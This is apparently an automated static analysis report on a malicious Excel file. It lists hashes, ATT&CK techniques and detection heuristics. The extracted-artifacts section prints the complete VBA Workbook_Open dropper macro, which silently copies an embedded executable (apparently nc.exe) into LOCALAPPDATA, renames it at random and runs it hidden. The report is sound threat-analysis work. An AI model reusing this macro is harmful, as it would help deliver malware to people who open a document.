Malicious Office (OOXML) — malware analysis report

Static analysis result for SHA-256 52a6f05233ead27f…

MALICIOUS

Office (OOXML)

927.5 KB Created: 2020-04-19 06:46:13 UTC Authoring application: Microsoft Excel 16.0300 First seen: 2020-07-24
MD5: ee764ec4b56c454d3e4edfe2f8c50088 SHA-1: c71193cab9286e69d12f68d8aa23195e0c296423 SHA-256: 52a6f05233ead27f48cf030ca6bd95089d16b80a2e997798e976837311f43a3c
336 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1204.002 Malicious File T1137.003 DLL Search Order Hijacking T1566.001 Spearphishing Attachment

The sample is a malicious Excel document containing a Workbook_Open VBA macro that uses WScript.Shell to execute a dropped payload. The macro constructs a target filename by concatenating the value of the LOCALAPPDATA environment variable with a randomly generated 8-character string, resulting in a path like 'C:\Users\Public\<random_string>.exe'. It then attempts to paste an embedded OLE object (identified as 'ooxml_oleobject_00.bin' and 'ooxml_oleobject_00_ole10native_00.bin') into the LOCALAPPDATA directory and rename it to the generated executable name. Finally, it executes this dropped file using Shell(). This indicates the document's purpose is to download and execute a second-stage payload.

Heuristics 10

  • ClamAV: Doc.Dropper.Agent-7726048-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Dropper.Agent-7726048-0
  • Ole10Native package drops an auto-executable payload critical OFFICE_PACKAGE_RISKY_FILE
    OLE Package displayName or fullPath ends in a directly auto-executable extension (a runnable binary or a script the default shell host runs on double-click). Embedding such a payload inside an Office document has no benign authoring use — it is a malware-delivery dropper.
  • VBA project inside OOXML medium 5 related findings OOXML_VBA
    Document contains a VBA project — VBA macros present
  • WScript.Shell usage critical OLE_VBA_WSCRIPT
    WScript.Shell usage
    Matched line in script
        targetFileName = Environ("LOCALAPPDATA") & "/" & RandomString & ".exe"
    Set shell_obj = CreateObject("WScript.Shell")
    ActiveSheet.OLEObjects(1).Visible = False
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
    Matched line in script
        targetFileName = Environ("LOCALAPPDATA") & "/" & RandomString & ".exe"
    Set shell_obj = CreateObject("WScript.Shell")
    ActiveSheet.OLEObjects(1).Visible = False
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Workbook_Open macro low OLE_VBA_WBOPEN
    Workbook_Open macro
    Matched line in script
    Attribute VB_Customizable = True
Private Sub Workbook_Open()
    On Error Resume Next
  • Environ() call (env variable access) low OLE_VBA_ENVIRON
    Environ() call (env variable access)
    Matched line in script
        Dim targetFileName As String
    originalFileName = Environ("LOCALAPPDATA") & "/nc.exe"
    CharacterBank = Array("a", "b", "c", "d", "e", "f", "g", "h", "i", "j", _
  • Embedded OLE object medium OOXML_OLE_OBJECT
    Document contains an embedded OLE object
  • Suspicious extracted artifact medium EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.

Extracted artifacts 5

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source from OOXML) 1944 bytes
SHA-256: 0e2283a77ad8b5e96adeb8db3b27c21c4476fc36912173b47663360cbf505e77
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Private Sub Workbook_Open()
    On Error Resume Next
    Dim shell_obj
    Dim CharacterBank As Variant
    Dim x As Long
    Dim str As String
    Dim orginalFileName As String
    Dim targetFileName As String
    originalFileName = Environ("LOCALAPPDATA") & "/nc.exe"
    CharacterBank = Array("a", "b", "c", "d", "e", "f", "g", "h", "i", "j", _
         "k", "l", "m", "n", "o", "p", "q", "r", "s", "t", "u", "v", "w", "x", _
         "y", "z", "0", "1", "2", "3", "4", "5", "6", "7", "8", "9", _
         , "A", "B", "C", "D", "E", "F", "G", "H", _
         "I", "J", "K", "L", "M", "N", "O", "P", "Q", "R", "S", "T", "U", "V", _
         "W", "X", "Y", "Z")
    For x = 1 To 8
        Randomize
        str = str & CharacterBank(Int((UBound(CharacterBank) - LBound(CharacterBank) + 1) * Rnd + LBound(CharacterBank)))
    Next x
    RandomString = str
    targetFileName = Environ("LOCALAPPDATA") & "/" & RandomString & ".exe"
    Set shell_obj = CreateObject("WScript.Shell")
    ActiveSheet.OLEObjects(1).Visible = False
    ActiveSheet.OLEObjects(1).Copy
    CreateObject("Shell.Application").Namespace(Environ("LOCALAPPDATA")).Self.InvokeVerb "Paste"
    Name originalFileName As targetFileName
    shell_obj.Run Chr(34) & Environ("LOCALAPPDATA") & "/" & RandomString & ".exe" & Chr(34), 0
End Sub



Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
ooxml_oleobject_00.bin ooxml-ole-object OOXML embedded OLE part: xl/embeddings/oleObject1.bin 676352 bytes
SHA-256: e4f54bc5ca53f7684403c861f9059e1da19e28dd176200fd7b666db2adc61094
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Static shellcode analysis found candidate code region(s). Indicators: heap spray 0x04
ooxml_oleobject_00_ole10native_00.bin ole-package OOXML xl/embeddings/oleObject1.bin Ole10Native stream: Ole10Native 668493 bytes
SHA-256: 16db8f8c0c2faed495c429294a08a1787f7e2a19b6a41ef4b11680ee2b6c7b88
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Static shellcode analysis found candidate code region(s). Indicators: heap spray 0x04
vbaProject_00.bin vba-project OOXML VBA project: xl/vbaProject.bin 22016 bytes
SHA-256: 869bf03c339bc8d51af8aaecf22cc92e4cf5ce80f91e49f3b4f2dba896f07be5
emf_00.emf ooxml-emf OOXML EMF part: xl/media/image1.emf 4968 bytes
SHA-256: 1516b13bc403900010b235de8cd7e8c8577d4dd6e73bfa0fdc26427943f3f948

Open this report in the interactive analyzer, or submit your own file for analysis.